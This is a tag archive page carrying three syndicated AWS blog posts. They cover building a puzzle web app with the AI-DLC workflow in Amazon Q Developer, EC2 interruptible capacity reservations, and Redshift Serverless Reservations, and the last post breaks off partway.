Tag Archives: Best practices

Building with AI-DLC using Amazon Q Developer

Post Syndicated from Will Matos original https://aws.amazon.com/blogs/devops/building-with-ai-dlc-using-amazon-q-developer/

The AI-Driven Development Life Cycle (AI-DLC) methodology marks a significant change in software development by strategically assigning routine tasks to AI while maintaining human oversight for critical decisions. Amazon Q Developer, a generative AI coding assistant, supports the entire software development lifecycle and offers the Project Rules feature, allowing users to tailor their development practices within the platform.

Recently, AWS made its AI-DLC workflow open-source, enabling developers to create software using this methodology. This workflow is implemented in Amazon Q Developer through its Project Rules customization feature. In this post, we will demonstrate how the AI-DLC workflow operates in Amazon Q Developer using an example use case.

AI-DLC Workflow Overview

The AI-DLC workflow is the practical implementation of the AI-DLC methodology for executing software development tasks. As outlined in the AI-DLC Method Definition Paper, the workflow has three phases. These phases are Inception, Construction, and Operations. Inception involves planning and architecture. Construction focuses on design and implementation. Operations cover deployment and monitoring. Each phase includes distinct stages. These stages address specific software development life cycle functions. The workflow adapts to project requirements. It analyzes requests, codebases, and complexity. This analysis determines the necessary stages. Simple bug fixes skip planning. They go directly to code generation. Complex features need requirements analysis. They also require architectural design and detailed testing.

The workflow maintains quality and control through structured milestones and transparent decision-making. At each phase, AI-DLC asks clarifying questions, creates execution plans, and waits for approval. Every decision, input, and response is logged in an audit trail for traceability. Whether building a new microservice, refactoring legacy code, or fixing a production bug, AI-DLC scales its rigor to match needs—comprehensive when complex, efficient when simple, and always in control. Figure 1 shows the phases and stages within the adaptive AI-DLC workflow. The stages shown in green boxes are mandatory, while those in yellow boxes are conditional.

AI-DLC workflow diagram showing three phases: Inception Phase (blue) with mandatory steps for Workspace Detection, Requirements Analysis, and Workflow Planning, plus conditional steps for Reverse Engineering, User Stories, Application Design, and Units Generation; Construction Phase (green) with conditional steps for Functional Design, NFR Requirements, NFR Design, and Infrastructure Design, followed by mandatory Code Generation and Build and Test steps that loop for each unit; and Operations Phase (orange) with an Operations step. The workflow flows from User Request at the top to Complete at the bottom.

Figure 1. SDLC phases and stages in AI-DLC workflow

Prerequisites

Before we begin the walk-through, we must have an AWS account or AWS Builder Id for authenticating Amazon Q Developer. If you don’t have one, sign up for AWS account or create an AWS builder id. You can use any of the Integrated Development Environments (IDEs) supported by Amazon Q Developer and install the extension as per the AWS documentation. In this post, we’ll be using the Amazon Q Developer extension in VS Code IDE. Once the plug-in is installed, you’ll need to authenticate Q Developer with the AWS cloud backend. Refer to the AWS documentation for Q Developer authentication instructions.

The AI-DLC workflow generates various Mermaid diagrams in markdown files. To view these diagrams within your IDE, you can install a Mermaid viewer plugin.

Let’s Begin Building!

Let’s construct a simple River Crossing Puzzle as a web UI app using AI-DLC. By choosing a straightforward app, we can concentrate more on learning the AI-DLC workflow and less on the project’s technical intricacies.

The sections below outline the individual steps in the AI-DLC development process using Amazon Q Developer. We’ll showcase screenshots of our IDE with the Amazon Q Developer plug-in and demonstrate how to interact with the workflow.

Although we’ve used the Amazon Q Developer IDE plug-in in this blog post, you can also use Kiro Command Line Interface (CLI) to build with AI-DLC without any additional setup. The workflow remains the same, except that you’ll interact through the command line instead of the graphical interface in the IDE.

As we progress through the workflow, your AI-DLC experience will be tailored to your specific problem statement. You’ll also notice the probabilistic nature of large language models (LLMs), as the questions and artifacts generated by them will vary from one run to another for the same problem statement. For example, if you attempt to replicate the same problem statement we used in this blog post, your experience will likely differ. This is expected and desirable. Despite these minor variations, we’ll eventually find a solution to the problem we initially set out to address.

Step 1: Clone GitHub repo containing the AI-DLC Q Developer Rules

Clone the GitHub repo containing the AI-DLC Q Developer Rules:

git clone https://github.com/awslabs/aidlc-workflows.git

Step 2: Load Q Developer Rules in your project workspace

Follow the README.md instructions in the GitHub repo to copy the rules files over to your project folder.

Step 3: Install and authenticate Amazon Q Developer Extension in IDE

Open the project folder you created in Step 2 in VS Code. Open the Amazon Q Chat Panel in the IDE and ensure that the AI-DLC workflow rules are loaded in Q Developer, as shown in Figure 2. If you don’t see what’s shown in Figure 2, please double-check the steps you performed in Step 2.

Screenshot showing four steps to access AI-DLC rules in Amazon Q: Step 1 shows opening Amazon Q Chat Panel from the left sidebar; Step 2 shows opening a chat session in Amazon Q at the top; Step 3 shows clicking on the Rules button in the chat interface; Step 4 shows ensuring AI-DLC rules are loaded in the rules panel on the right side of the screen.

Figure 2: AI-DLC rules enabling in Amazon Q Developer

Step 4: Start the AI-DLC workflow by entering a high-level problem statement

Our development environment is now set up, and we’re ready to begin application development using AI-DLC. In our Q Developer chat session, we enter the following problem statement:

Using AI-DLC let's build a web application to solve the river crossing puzzle.

Notice that we’ve prefixed our problem statement with “Using AI-DLC …” to ensure that Q Developer engages the AI-DLC workflow. Figure 3 shows what happens next. The AI-DLC workflow is triggered within Q Developer. It greets us with a welcome message and provides a brief overview of the AI-DLC methodology.

Figure 3 shows an expanded view of the AI-DLC workflow rules folder structure on the left. You’ll notice that a single aws-aidlc-rules/core-workflow.md is placed in the designated .amazonq/rules folder, while the rest of the rules files are placed in an ordinary aws-aidlc-rule-details folder. This arrangement is designed to optimize model efficiency. By placing the aws-aidlc-rules/core-workflow.md file in the .amazonq/rules folder, , it serves as additional context, ensuring that the core workflow structure is always accessible without incurring additional token consumption. Conversely, the detailed phase and stage-level behavior rules are stored in the aws-aidlc-rule-details folder and are dynamically loaded as required. This approach conserves Amazon Q’s context window and token usage by retaining only the necessary information within the context at any given time, thereby enhancing model efficiency.

The rules files under the aws-aidlc-rule-details folder are organized into three sub-folders, each representing a phase of AI-DLC. Within each phase, there are stage-specific files. A common folder houses cross-cutting rules applicable to all AI-DLC phases and stages such as the “human-in-the-loop”.

The AI-DLC workflow is self-guided and provides us with a clear understanding of what to expect next. It informs us that it will enter the AI-DLC Inception phase next, starting with the Workspace Detection stage within it.

Screenshot of Amazon Q interface showing AI-DLC workflow initialization. The left sidebar displays a file tree with various workflow stages and configuration files. The main chat area shows a problem statement input box at the top with placeholder text 'Using AI-DLC let's build a web application to solve the most pressing problem.' Below is a welcome message explaining AI-DLC (AI-Driven Development Life Cycle) and its capabilities. Three callout annotations highlight: 1) The core workflow dynamically utilizes detailed instructions for different phases and stages, loading and unloading them as required; 2) AI-DLC workflow kicks off with a welcome message and precise overview; 3) The workflow is structured to load a single Q Developer Rule file, one workflow.md, which then dynamically loads and unloads the stage definitions housed in the 'aws-aidlc-rule-details' folder as needed.

Figure 3: User enters high level problem statement in Amazon Q. AI-DLC workflow is triggered.

Step 5: Workspace Detection

We enter the Workspace Detection stage within the Inception phase. In this stage, AI-DLC analyzes the current workspace and determines whether it’s a greenfield (new) or brownfield (existing) application. Since AI-DLC is an adaptive workflow, it decides whether the next stage will be Reverse Engineering (for brownfield projects) or Requirements Analysis (for greenfield projects).

Since we’re building a greenfield application and there’s no existing code in the workspace to reverse engineer, the workflow will guide us to Requirements Analysis next. If we were working on a brownfield application, the workflow would have performed Reverse Engineering first and then moved on to Requirements Analysis. This demonstrates the adaptive nature of the workflow.

Figure 4 illustrates the process in our IDE when we enter this stage. The workflow requests our permission to create an aidlc-docs folder under the project root. This folder will serve as the repository for all the artifacts generated by AI-DLC during the workflow execution. Subsequently, the workflow generates two files within this folder: aidlc-state.md and audit.md. The purpose of these files is explained in Figure 4.

Screenshot of AI-DLC workspace detection phase showing the Amazon Q chat interface. The left sidebar displays the file tree with an 'aidlc-doc' folder highlighted. The main chat area shows the Inception Phase - Workspace Detection stage with explanatory text about analyzing the workspace. Five callout annotations explain: 1) Workflow creates aidlc-doc directory for storing AI-DLC generated artifacts; 2) The workflow tracks its progress in aidlc-metadata.json for error recovery and session continuity; 3) The audit.md file stores user's prompts; 4) Workflow highlights the AI-DLC phase and stage name with a clear heading for easy tracking; 5) Workflow loads detailed stage-level behavior files dynamically such that they don't consume the context window statically. At the bottom, a user approval prompt shows 'mkdir -p /Users/[...]/NewConsumerPortal/aidlc-docs' with the user asked to approve the 'mkdir' command.

Figure 4: Workspace Detection

The Workspace Detection will quickly finish as this is a greenfield project. The workflow will guide us into Requirements Analysis stage within the Inception phase next.

Step 6: Requirements Analysis

The workflow has progressed to the Requirements Analysis stage, where we will define the application requirements. The AI-DLC workflow presented our high-level problem statement to the Q Developer, which then responded with several requirements clarifications questions, as illustrated in Figure 4.

Several AI-DLC rules came into play at this stage. One rule instructed Amazon Q to avoid making assumptions on the user’s behalf and instead ask clarifying questions. Since LLMs tend to make assumptions and rush towards outcomes, they must be explicitly instructed to align with the engineering rigor of the AI-DLC methodology. To achieve this, the Q Developer presented several requirements clarification questions in requirement-verification-questions.md file and asked us to answer them inline in the file.

Another AI-DLC rule instructed the Q Developer to present questions in multiple-choice format and always include an open-ended option (“Other”) to enhance user convenience and provide flexibility in answering.

As shown in Figure 5, Amazon Q has asked us about the desired puzzle variant, such as the Classic Farmer, Fox, Chicken, and Grain puzzle or other popular variations. Additionally, it has asked us questions about user interaction methods, score persistence across multiple players, and the creation of a leaderboard.

These questions are essential for achieving our desired application outcome. Our responses to these questions will determine the final product. While we didn’t explicitly specify this level of detail in our high-level problem statement, AI-DLC has delegated detailed requirements elaboration to Amazon Q, but we still retain control over what gets built.

Screenshot of AI-DLC Requirements Analysis phase showing a split view. The left side displays a requirements clarification questions markdown file with multiple-choice questions about the Kuer Crossing Portal, including sections about user crossing portal variants, primary user interaction methods, and data storage preferences. The right side shows the Amazon Q chat interface with the Inception Phase - Requirements Analysis heading. Two callout annotations highlight: 1) AI-DLC asks questions in multiple choice format, with an 'Other' option that leaves an open-ended fill-in-the-blank when the answer doesn't match the predefined options; 2) AI-DLC generates config.requirements-clarification-questions.md file containing requirements clarification questions, with questions placed in an MD file where the user can respond inline in the file, using 'Answered' to indicate completion. The chat shows instructions for answering questions to clarify requirements.

Figure 5: Requirements Analysis

We answer all the questions in requirement-verification-questions.md file and enter “Done” in the chat window.

Amazon Q processes our responses. The AI-DLC workflow is designed to identify human errors. It checks if we’ve answered all the questions and identifies any contradictions or ambiguities in our answers. Any confusions, contradictions, or ambiguities will be flagged for follow-up questions. AI-DLC adheres to high standards and ensures that we don’t proceed to the next step until we’re fully in agreement on the requirements between us and Amazon Q.

Since we answered all the questions and there were no contradictions in our answers, the workflow continues and generates a comprehensive requirements.md document, as shown in figure 6.

Screenshot showing AI-DLC requirements review phase with split view. The left side displays a Requirements Document for the River Crossing Puzzle Web Application, including Intent Analysis Summary, User Request details, Request Type, and Functional Requirements with Core Puzzle Functionality items (FR-001 through FR -006) describing game features like classic farmer puzzle, timer display, move tracking, puzzle state validation, and victory messages. The right side shows the Amazon Q chat interface with 'Requirements Analysis Complete' heading, displaying project details including Puzzle Type (Classic Farmer, Fox, Chicken, and Grain river crossing puzzle), Technology (React-based modern web application), and Target Devices (web browsers only). Three callout annotations highlight: 1) Requirements Analysis phase complete; 2) Requirements document generated; 3) User may Request Changes, Add User Stories for Approval, or Approve & Continue, with a REVIEW SAFETY note warning users to review requirements and approve to continue, with options to request changes or add modifications if required.

Figure 6: Requirements Review

The workflow prompts us to review the requirements.md document and decide on the next step. If we’re not aligned on the requirements, we can prompt Amazon Q to help us achieve alignment. We can then iterate on the requirements until we’re fully aligned. Once we’re fully aligned, we prompt AI-DLC to progress to the next stage.

Given the adaptive nature of the AI-DLC workflow, Amazon Q has recommended that this application is simple enough, and we can skip the User Stories stage. If we felt otherwise, we would have overridden the model’s recommendation. In this case, we agree with Q’s recommendation and will therefore enter “Continue” in the chat window.

The workflow will enter Workflow Planning stage next.

Step 7: Workflow Planning

With our requirements established, we proceed to the Workflow Planning stage. In this phase, we leverage the requirements context and the workflow’s intelligence to plan the execution of specific stages of AI-DLC within the workflow to build our application as per the requirements specification.

Figure 7 illustrates the workflow planning stage in Q Developer. The workflow has generated an execution-plan.md file that outlines the recommended stages for execution and those that should be skipped.

The workflow planning process is highly contextual to the requirements. During requirements analysis, we decided to develop a simple river crossing puzzle application, consisting of a single HTML file, without a backend, leaderboard, or persistence. Consequently, Amazon Q recommends that we skip all the conditional stages, such as User Stories, Application Design, Units of Work Planning, and so on, and proceed directly to the Code Generation Planning stage in the Construction phase.

Figure 7 visually represents the recommended workflow graphically, indicating the stages that will be executed and those that will be skipped.

Screenshot of AI-DLC Workflow Planning phase showing an Execution Plan document on the left with Detailed Analysis Summary including user-facing changes, brownfield changes, API changes, and NFR changes, plus Risk Assessment. Below is a Workflow Visualization flowchart diagram showing the workflow stages from Inception through Construction to Operations phases. The right side shows the Amazon Q chat with 'Workflow Planning Complete' heading. Three callout annotations highlight: 1) AI -DLC workflow has analyzed requirements and based on the problem complexity has proposed a set of stages to execute in the workflow; 2) Problem is simple enough that AI-DLC is proposing to skip the detailed optional stages; 3) User may Request Changes, Add back skipped stages or Approve & Continue.

Figure 7: Workflow Planning

Since we’ve opted for a straightforward web UI app in this blog post for brevity, the workflow execution plan suggested by AI-DLC aligns seamlessly with our objectives. Should we not be aligned with the AI-DLC recommended workflow execution plan, we would request Q Developer to modify the plan to suit our preferences.

Since we’ve agreed on the workflow plan, we’ll enter “Continue” in Q’s chat session. If we weren’t aligned with the recommended workflow execution plan, we’d have prompted Q with our concerns and iterated over the revised execution plan until it aligned with our preferences. Following the recommended execution plan, the workflow will transition into the Construction phase and directly into the Code Generation Plan stage in the phase.

Step 8: Code Generation Planning

AI-DLC prioritizes planning over rushing to outcomes. This approach aligns with the concept of human-in-the-loop behavior, allowing us to detect issues early on, provide feedback on the plan, and prevent wrong assumptions from propagating further. Before we proceed with actual Code Generation, we undergo Code Generation Planning.

During Code Generation Planning, AI-DLC creates a detailed, numbered plan. It analyzes the requirements and design artifacts, breaking down the process into explicit steps for generating business logic, the API layer, the data layer, tests, documentation, and deployment files.

The plan is documented in a {unit-name}-code-generation-plan.md file, complete with check boxes. This ensures transparency, allowing users to see what will be built. It also provides control, enabling users to modify the plan. Additionally, it maintains quality by ensuring comprehensive coverage of code, tests, and documentation.

Figure 8 illustrates the AI-DLC’s code generation plan. The proposed workflow comprises eight steps, starting with creating an HTML structure and progressing to adding styling, game logic, and concluding with testing and documentation.

Screenshot of AI-DLC Code Generation Planning showing a Code Generation Plan document for River Crossing Puzzle on the left, with Unit Context listing HTML Structure, CSS Styling, and JavaScript files, followed by Unit Generation Steps including Step 1: HTML Structure Generation, Step 2: CSS Styling Generation, and Step 3 : Core Game Logic Generation with detailed checkboxes for each step. The right side shows Amazon Q chat with code generation plan details. Three callout annotations highlight: 1) The plan doc contains to-do items for AI-DLC to execute. These checkboxes get completed when the task is done; 2) This is how AI-DLC workflow persists and tracks progress state; 3) AI-DLC has proposed an 8-step code generation plan with checkboxes and review prompts, and User may Request Changes or Approve & Continue.

Figure 8: Code Generation Planning

The code generation plan appears reasonable to us. We will proceed to the Code Generation stage by entering “Continue” in Q’s chat session.

Step 9: Code Generation

The Code Generation stage executes the Code Generation Plan we approved in the previous step. It generates actual code artifacts step-by-step, including business logic, APIs, data layers, tests, and documentation. Completed steps are marked with check boxes, progress is tracked, and story traceability is ensured before presenting the generated code for user approval.

Figure 9 illustrates that the Code Generation stage has been completed. We are now reviewing a single index.html file generated with embedded styling and JavaScript consistent with our preference specified in requirements.md.

The workflow provides a summary of the activities performed during the Code Generation phase.

Screenshot of AI-DLC Code Generation phase showing generated HTML code on the left with embedded styling and JavaScript for the River Crossing Puzzle application. The right side shows Amazon Q chat with 'Code Generation Complete - river-crossing-puzzle' heading and a list of generated artifacts including HTML file, CSS interface, drag-and-drop interface, game logic, and testing services. Two callout annotations highlight: 1) The generated code is an HTML file with embedded styling and JavaScript; 2) We have specified during requirements analysis phase that we want a single-file index.html file implementation; 3) Code generation has been completed, and a summary of the generated artifacts is provided.

Figure 9: Code Generation

We’re about to test our newly created application soon. While it may be straightforward to test this simple puzzle app right now, for complex applications, we generate build and test instructions using AI-DLC.

We’ll enter “Continue” in the workflow and enter the final Build and Test stage in the Construction phase.

Step 10: Build and Test

These questions are essential for achieving our desired application.
We’ve reached the final stage of the AI-DLC Construction Phase, known as the Build and Test stage. During this stage, we create comprehensive instruction files that guide the build and packaging of the project, and document the necessary testing layers. These layers include unit tests (validating generated code), integration tests (checking unit interactions), performance tests (load/stress testing), and additional tests as required (security, contract, e2e).

The generated build instructions include dependencies and commands, test execution steps with expected results, and a summary document that provides an overview of the overall build/test status and the project’s readiness for deployment.

Figure 10 illustrates the documentation generated during this stage.

Screenshot of AI-DLC Build and Test phase showing a Build and Test Summary document on the left with Build Status (Build Tool, Build Status, Build Artifacts, Build Warnings) and Test Execution Summary including Unit Tests, Integration Tests, and Performance Tests sections with checkmarks and failure indicators. The right side shows Amazon Q chat with build and test completion status and project summary. Two callout annotations highlight: 1) Build and Test Complete! Build and Test instructions have been documented; 2) The AI-DLC workflow has concluded with a comprehensive summary of all completed stages and generated artifacts.

Figure 10: Build and Test

The AI-DLC workflow has now concluded.

Let’s Solve the Puzzle!

We open index.html in a web browser to access our newly created River Crossing Puzzle application. As shown in figure 11, we see our graphical web UI.

During requirements assessment, we chose a straightforward user interface using HTML, CSS, and JavaScript (without any frameworks), as evident in the display shown in Figure 11. Your display may vary due to the probabilistic nature of LLMs and the choices you made for requirements.

We attempt to solve the puzzle and find that it works as expected.

Side-by-side screenshots of the River Crossing Puzzle web application showing two game states. The left screenshot shows the initial state with a farmer on the left bank, and fox, chicken, and grain items listed below, with a blue river in the center and right bank on the right. The right screenshot shows a game state after moves with the farmer on the right bank and a success message 'Congratulations! You won in 7 moves!' displayed at the bottom. Both screens have a yellow 'Start Over' button and show move counts.

Figure 11: River Crossing Puzzle Web App

Conclusion

This post shows how AWS’s open-source AI-DLC workflow, guided by Amazon Q Developer’s Project Rules feature, helps developers build applications with structured oversight and transparency.

Using a River Crossing Puzzle web application as an example, the walk-through illustrates how AI-DLC methodology adapts its rigor based on project complexity, skipping unnecessary stages for simple applications while maintaining comprehensive processes for complex projects. Throughout each stage, AI-DLC enforces “human-in-the-loop” behavior, requiring user approval at critical checkpoints, asking clarifying questions, and maintaining complete audit trails for traceability.

The exercise successfully demonstrates how AI-DLC balances AI automation with human oversight, enhancing productivity without sacrificing quality or control. By following this structured, repeatable methodology, development teams can leverage generative AI’s capabilities while ensuring humans remain in charge of architectural decisions and implementation approaches. This framework provides the necessary guardrails for responsible and effective AI-assisted software development across projects of varying complexity.

Cleanup

We did not create any AWS resources in this walk-through, so no AWS cleanup is needed. You may cleanup your project workspace at your discretion.

Ready to get started? Visit our GitHub repository to download the AI-DLC workflow and join the AI-Native Builders Community to contribute to the future of software development.

About the authors:

Raja SP

Raja is a Principal Solutions Architect at AWS, where he leads Developer Transformation Programs. He has worked with more than 100 large customers, helping them design and deliver mission critical systems built on modern architectures, platform engineering practices, and Amazon inspired operating models. As generative AI reshapes the software development landscape, Raja and his team created the AI Driven Development Lifecycle (AI-DLC) — an end to end, AI native methodology that re-imagines how large teams collaboratively build production-grade software in the AI era.

Raj Jain

Raj is a Senior Solutions Architect, Developer Specialist at AWS. Prior to this role, Raj worked as a Senior Software Development Engineer at Amazon, where he helped build the security infrastructure underlying the Amazon platform. Raj is a published author in the Bell Labs Technical Journal, and has also authored IETF standards, AWS Security blogs, and holds twelve patents

Siddhesh Jog

Siddhesh is a Senior Solutions Architect at AWS. He has worked in multiple industries in a wide variety of roles and is passionate about all things technology. At AWS Siddhesh is most excited to help customers transition to the AI Driven Development Lifecycle and enable them to build applications rapidly in a secure, complaint and cost efficient cloud environment.

Will Matos

Will Matos is a Principal Specialist Solutions Architect with AWS’s Next Generation Developer Experience (NGDE) team, revolutionizing developer productivity through Generative AI, AI-powered chat interfaces, and code generation. With 27 years of technology, AI, and software development experience, he collaborates with product teams and customers to create intelligent solutions that streamline workflows and accelerate software development cycles. A thought leader engaging early adopters, Will bridges innovation and real-world needs .

Optimize unused capacity with Amazon EC2 interruptible capacity reservations

Post Syndicated from Shubham Sarin original https://aws.amazon.com/blogs/compute/optimize-unused-capacity-with-amazon-ec2-interruptible-capacity-reservations/

Organizations running critical workloads on Amazon Elastic Compute Cloud (Amazon EC2) reserve compute capacity using On-Demand Capacity Reservations (ODCR) to have availability when needed. However, reserved capacity can intermittently sit idle during off-peak periods, between deployments, or when workloads scale down. This unused capacity represents a missed opportunity for cost optimization and resource efficiency across the organization.

Amazon EC2 now offers interruptible ODCRs, a new capability that lets you make unused compute capacity temporarily available to other workloads while maintaining control to reclaim it. This feature helps you optimize reservations and reduce costs across your AWS organization.

In this post, we explore how this works through a practical customer scenario.

Customer scenario: Maximizing reservation utilization across

Consider a financial services company where the trading platform team maintains a large fleet of r7i.4xlarge instances reserved around-the-clock for critical blue/green deployments. During off-peak trading hours and weekends, a significant portion of this reserved capacity sits idle. Meanwhile, the data analytics team regularly runs batch processing jobs for risk modeling—workloads that could benefit from additional compute capacity but don’t require the same availability guarantees as the trading platform.

Previously, sharing this capacity meant losing control over when it could be reclaimed, creating operational challenges when the trading platform needed to scale up quickly during market volatility. Interruptible ODCRs solve this problem by giving the reservation owner control to reclaim capacity when needed for critical operations.

In the following sections, we walk through the key steps to configure capacity sharing, launch instances, and reclaim capacity. The high-level steps are:

  1. Set up capacity sharing
  2. Discover available capacity and launch instances
  3. Reclaim capacity and handle interruptions

Step 1: Set up capacity sharing

The trading platform team begins by identifying unused capacity patterns through Amazon EC2 Capacity Manager. They determine that approximately 60% of their reserved r7i.4xlarge capacity remains unused during overnight hours and weekends.

Create interruptible ODCR

For prerequisites, see Interruptible Capacity Reservations for capacity owners in the Amazon EC2 User Guide.

To repurpose this idle capacity, the trading platform team creates an interruptible ODCR using the AWS Management Console, SDK, or AWS Command Line Interface (AWS CLI). To use the console, they complete the following steps:

  1. On the Amazon EC2 console, choose Capacity Reservations in the navigation pane.
  2. Select the source ODCR and choose Create interruptible reservation.
  3. For Instances to allocate, enter how many instances to allocate (out of a 100-instance reservation). For this example, we allocate 60 instances.
  4. Choose Create interruptible reservation.

This configuration withdraws 60 instances from their original reservation and creates a new ODCR with interruptible configuration. The original reservation now shows 40 instances, and the new interruptible reservation shows 60.

Create interruptible on-demand capacity reservation

Share resources across the organization

With the interruptible reservation created, the reservation owning team uses AWS Resource Access Manager (AWS RAM)—a service that helps you securely share AWS resources across accounts and organizations—to share the newly created ODCR with additional accounts in their organization. When sharing your ODCR, you specify which consumer account IDs in your organization will get access to the interruptible ODCR. Alternatively, you can share the ODCR with your entire AWS Organization or Organizational Unit (OU). When it’s complete, the specified accounts get access to the interruptible ODCR capacity and establish a setup like the one illustrated in the following diagram.

Share resources across the organization

Sharing with all accounts (at once) within the organization requires organization-wide sharing to be enabled in AWS Organizations setup. If organization-wide sharing is not enabled, a user can still share with individual accounts by enumerating each account.

Step 2: Discover available capacity and launch instances

After the reservation owner (the trading platform team) shares their reservation, the capacity consumer (data analytics team) needs to find the capacity in their account and launch into it. In this section, we walk through the interruptible ODCR discovery and launch process.

Discover available capacity

The data analytics team, running batch processing jobs in a separate AWS account, can now find the shared interruptible capacity in their account using the console, SDK, or AWS CLI. To use the console, they complete the following steps:

  1. On the Amazon EC2 console, choose Capacity Reservations in the navigation pane.
  2. Choose the ODCR to view its details page.

The interruptible reservation appears with a clear indication that it’s interruptible, showing the instance type (r7i.4xlarge), Availability Zone, and available capacity.

Discover available capacity

Configure Auto Scaling groups for interruptible capacity

To use this capacity for their batch processing workloads, the analytics team creates a new launch template specifically designed for interruptible capacity. The key configuration element is setting the new market-type parameter and targeting the interruptible ODCR.

In the launch template, specify the following:

  • Instance type: r7i.4xlarge (matching the shared capacity)
  • Capacity reservation specification: Targeted
  • Capacity reservation ID: Enter the ID of the shared interruptible ODCR
  • Market type: Use the type interruptible-capacity-reservation

Next, create an Auto Scaling group that uses this launch template. The group is configured as follows:

  • Minimum size: 0 (to avoid unnecessary costs when capacity isn’t needed)
  • Maximum size: 40 (within the available shared capacity)
  • Desired capacity: Set based on job queue length

Launch instances into interruptible capacity

When the analytics team’s batch processing jobs trigger scaling events, the Auto Scaling group launches instances that automatically target the shared interruptible ODCR. These instances launch immediately if capacity is available, providing the team with access to reserved capacity for their fault-tolerant workloads. The instances appear on the Amazon EC2 console with their instance lifecycle as interruptible-capacity-reservation and the ODCR ID in which they’re running. This provides clear indication that they’re running on interruptible capacity, helping with monitoring and cost allocation.

Step 3: Reclaim capacity and handle interruptions

In this section, we review how the capacity owner (the trading platform team) can reclaim their capacity when needed for their critical operations and how the capacity consumer can gracefully handle such interruptions.

Trigger reclamation

When market volatility increases and the trading platform needs to scale up quickly, the platform team initiates capacity reclamation through the console, SDK, or AWS CLI. To use the console, they complete the following steps:

  1. On the Amazon EC2 console, choose Capacity Reservations in the navigation pane.
  2. Choose the ODCR to view its details page.
  3. Choose Edit Interruptible Allocation.
  4. Specify how many instances are needed back (in this case, all 60 instances for maximum trading capacity).
  5. Choose Update, then choose Confirm.

Edit interruptible allocation

The reclamation process can also be automated using AWS Lambda functions triggered by Amazon CloudWatch alarms or scheduled events, providing proactive capacity management based on predictable usage patterns.

Consumer notification and graceful shutdown

After the owner triggers capacity reclamation, consuming instances receive a 2-minute instance interruption warning notice through Amazon EventBridge. The analytics team has configured their batch processing applications to listen for these events. Their applications receive this 2-minute warning and immediately begin checkpointing their current work, saving intermediate results to Amazon Simple Storage Service (Amazon S3), and gracefully shutting down. For EventBridge notification details, refer to the Monitor interruptible Capacity Reservations with EventBridge section in the EC2 Capacity Reservations User Guide.

Automatic capacity restoration to source ODCR

After the 2-minute notice period, Amazon EC2 starts shutting down the consuming instances. After the instances are successfully shut down, Amazon EC2 restores the capacity to the trading platform’s original ODCR. The trading platform can then launch their critical workloads into the same ODCR, resulting in minimal delay for their scaling requirements. The reservation owner can track their capacity reclamation status through the console or API. On the Amazon EC2 console, the ODCR details page shows the current instance allocation, target instance allocation, and request status. When current and target counts match, the status changes to Active, confirming completion.

After the reservation owner requests their capacity back, the capacity reclamation process can take a few minutes, so reservation owners should account for this delay when planning critical activities. This is because Amazon EC2 provides a 2-minute warning to the consumer instances, followed by the instance shutdown period.

Billing and cost considerations

The billing model for interruptible ODCRs follows a clear usage-based approach that aligns costs with consumption:

  • Reservation owner (trading platform team) – Pays EC2 On-Demand rates for unused capacity in the interruptible ODCR, just like any standard ODCR. For example, when the analytics team uses 30 out of 60 available instances, the trading platform pays for the remaining 30 unused instances.
  • Consumer (analytics team) – Pays EC2 On-Demand rates only for the instances they actually launch and use. For example, when they use 30 instances for 4 hours, they’re charged for 30 × 4 = 120 instance-hours at the standard r7i.4xlarge On-Demand rate.

Conclusion

Amazon EC2 interruptible ODCR helps organizations optimize compute spending while maintaining operational control. Through capacity reclamation mechanisms, teams can achieve better resource utilization without compromising availability guarantees. In this post, we showed how this capability addresses real operational challenges through an example use case—enabling a trading platform to maintain their critical capacity guarantees while helping other teams access high-quality compute resources for their workloads. The predictable interruption model creates a sustainable approach to capacity sharing that benefits the entire organization.

To get started with interruptible capacity reservations, refer to EC2 Capacity Reservations User Guide. To learn more about using EC2 Auto Scaling, refer the Interruptible Capacity Reservations with EC2 Auto Scaling guide. Refer to the AWS RAM User Guide to learn more about sharing resources across your organization and the Amazon EventBridge User Guide to learn more about handling interruption notifications in your applications.

Save up to 24% on Amazon Redshift Serverless compute costs with Reservations

Post Syndicated from Satesh Sonti original https://aws.amazon.com/blogs/big-data/save-up-to-24-on-amazon-redshift-serverless-compute-costs-with-reservations/

 Amazon Redshift Serverless makes it convenient to run and scale analytics without managing clusters, offering a flexible pay-as-you-go model. With Redshift Serverless Reservations, you can optimize compute costs and improve cost predictability for your Redshift Serverless workloads.

In this post, you learn how Amazon Redshift Serverless Reservations can help you lower your data warehouse costs. We explore ways to determine the optimal number of RPUs to reserve, review example scenarios, and discuss important considerations when purchasing these reservations.

How Amazon Redshift Serverless Reservations work

Amazon Redshift measures data warehouse capacity in Redshift Processing Units (RPUs). You pay for the workloads you run in RPU-hours on a per-second basis (with a 60-second minimum charge). 1 RPU provides 16 GB of memory. You can commit to a specific number of Redshift Processing Units (RPUs) for a one-year term. Two payment options are available: a no-upfront option with a 20% discount off on-demand rates, or an all-upfront option with a 24% discount. The reserved amount of RPUs is billed 24 hours a day, seven days a week

Amazon Redshift Serverless Reservations are managed at the AWS payer account level and can be shared across multiple AWS accounts. Any usage beyond your committed RPU level is charged at standard on-demand rates. You can purchase Serverless Reservations through either the Amazon Redshift console or the Amazon Redshift Serverless Reservations API using the create-reservation command.

Key benefits of Amazon Redshift Serverless Reservations

The following are some of the key benefits of subscribing to Redshift Serverless Reservations.

  • Cost savings through commitment: Redshift Serverless Reservations help you reduce your overall Redshift Serverless spend compared to on-demand (non-reserved) usage.
  • Centralized management: Supports reservation administration at the AWS payer account level for simplified governance and visibility across your organization.
  • Per-second metering with hourly billing: Offers per-second metering with hourly billing, so that you only pay for what you use. This cost-effective pricing model eliminates wasted resources and unnecessary charges, lowering your Amazon Redshift Serverless spend.
  • Predictable costs: The 24 hours a day, 7 days a week billing model offers stable monthly costs that simplify forecasting and budgeting.
  • Sharing capabilities between multiple AWS accounts: Enhances collaboration across different teams and departments, enabling improved resource utilization throughout your organization.

Determining optimal RPU reservation

You can determine your RPU reservation level through your serverless usage history and the AWS Billing and Cost Management recommendations.

Serverless usage history

You can use the Redshift Serverless Dashboard, which provides a detailed view of your workgroup and namespace activities. The dashboard helps you to analyze trends and patterns in your data warehouse usage. You can easily monitor your RPU capacity usage and total compute usage, helping you make informed decisions about resource allocation. For more granular analysis, you have the option to query the SYS_SERVERLESS_USAGE system table, which provides detailed historical usage data. To optimize costs while ensuring performance, you can reserve the minimum consistent RPUs used per hour by analyzing the usage patterns across all your workgroups.

AWS Billing and Cost Management recommendations

You can use AWS Billing and Cost Management to help you estimate your capacity needs:

  1. Navigate to your Billing and Cost Management dashboard.
  2. On the left navigation pane, expand Reservations.
  3. Choose Recommendations.
